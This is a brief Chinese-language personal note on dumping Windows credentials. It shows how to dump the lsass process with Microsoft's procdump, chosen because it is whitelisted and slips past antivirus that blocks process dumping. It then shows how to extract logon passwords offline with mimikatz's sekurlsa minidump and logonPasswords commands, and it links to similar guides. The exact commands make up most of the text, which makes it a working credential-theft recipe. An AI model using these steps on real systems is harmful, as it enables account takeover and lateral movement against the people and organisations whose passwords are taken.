唔,记的笔记,某些情况下,比较有用,国外很多杀毒还是禁止dump进程的….

密码会储存在 lsass进程中(08及以下可以读出明文密码)
用procdump或者任务管理器将lsass进程转换为储存文件(procdump是微软的东西,白名单的)

1
2
procdump.exe -accepteula -ma lsass.exe MyDump.dmp (听说加了at不需要管理员权限)
procdump.exe -ma lsass.exe MyDump.dmp

转换方法大全:https://www.cnblogs.com/jiangxueqiao/archive/2017/08/29/7447852.html
打包回来用mimikatz读取:

1
2
sekurlsa :: Minidump MyDump.dmp
sekurlsa :: logonPasswords

文章:
https://www.onlinehashcrack.com/how-to-procdump-mimikatz-credentials.php
http://blog.digital-forensics.it/2014/03/mimikatz-offline-addendum_28.html
https://cyberarms.wordpress.com/2015/03/16/grabbing-passwords-from-memory-using-procdump-and-mimikatz/